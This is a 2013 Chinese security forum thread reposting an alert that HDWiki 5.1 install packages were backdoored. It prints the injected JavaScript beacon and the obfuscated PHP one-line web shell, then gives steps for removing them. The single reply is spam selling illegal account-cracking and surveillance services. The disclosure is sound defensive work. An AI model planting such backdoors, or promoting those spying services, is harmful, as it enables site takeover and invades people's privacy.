首页
社区
课程
招聘
预警:HDWiki官方下载包被植入后门
发表于: 2013-9-24 14:26 2896

预警:HDWiki官方下载包被植入后门

2013-9-24 14:26
2896
新闻链接:http://www.2cto.com/News/201309/245345.html
   新闻时间:2013-09-22
   新闻正文:

  9月20日消息,今日安全联盟站长平台(zhanzhang.anquan.org)接到漏洞修复专家反馈信息称HDWiki百科建站系统“HDWiki5.1 正式版”(包括UTF8和GBK版本)下载安装包文件里被植入恶意网站木马(后门)文件。安全联盟研究人员立即确认并分析了该“木马后门”,初步推断官方网站被黑客入侵后,在最新HDwiki的下载安装包里植入了恶意网站木马文件,当站长用户下载安装后,会把该网站木马文件直接带入到站长的网站上,然后黑客可通过该该网站木马完全控制站长用户的网站系统,使网站沦为“肉鸡”。目前安全联盟站长平台已积极联系HDwiki官方,并发布紧急预警,目前请站长朋友们暂停下载安装HDWiki百科建站系统,对近期下载安装过HDwiki的朋友,百度加速乐(jiasule.baidu.com)联合安全联盟站长平台提供独家解决方案。

  后门文件分析

  经过我们分析,在HDWiki安装文件包里的文件做了如下修改:

  一、在文件/hdwiki/install/install.php里 83-84行加入了如下代码:

  if( !window.x){ (function(){(new Image()).src='http://kaiyuan.hudong.com/count2/install.php?location='+ escape((function(){try{return document.location.href}catch(e){return ''}})());})();

  二、增加一个php文件,也就是我们的木马文件,位置在/hdwiki/js/jqeditor/skins/bg/index.php 代码如下:

  < ?php /* [UCenter] (C)2001-2009 Comsenz Inc. This is NOT a freeware, use is subject to license terms $Id: client.php 913 2009-01-12 03:48:34Z zhaoxiongfei $ */ $a=range(1,200);$b=chr($a[96]).chr($a[114 ]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]). chr($a[83])}[马赛克]); ?>

  代码经过了编码加密,我们解密后确认该代码就是一个恶意的网站木马文件(编码加密过的“一句话木马”)。

  那么第一个文件里插入的js代码应该是为了收集“中招”了的网站地址,值得注意的是攻击者直接使用了官方的网站地址来收集这些信息。同时我们也注意到这个手法和以前的后门事件是非常相似的。

  历史上的“HDwiki后门事件”

  就在今年5月7日,HDwiki官方安装下载文件包里曾经也被植入了恶意的网站木马后门。

  详细见:http://bbs.jiasule.com/thread-3342-1-1.html

  解决方案

  查看您的网站是否存在文件 /hdwiki/js/jqeditor/skins/bg/index.php 如果存在直接删除。另外我们也更新了“HDWiki后面检测程序”(http://www.scanv.com/tools/ ),输入网址即可自动诊断。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
怎么查微信聊天记录 删除的怎么恢复?
这个问题我也遇到过的,我在网上看了很多办法,照着做都没有办到.最后我是找的一个专门做这方面业务的人弄的,他就会弄这方面的,你可以找他问问的,专业qq号密码,微信聊天记录 qq聊天记录 定位跟踪找人 通话清单 短信内容 ip地址 邮箱 人非常专业的,他的联系方式 QQ:84640778
应该能帮到你的。据我所知目前只有他会。
2013-9-26 13:34
0
游客
登录 | 注册 方可回帖
返回
//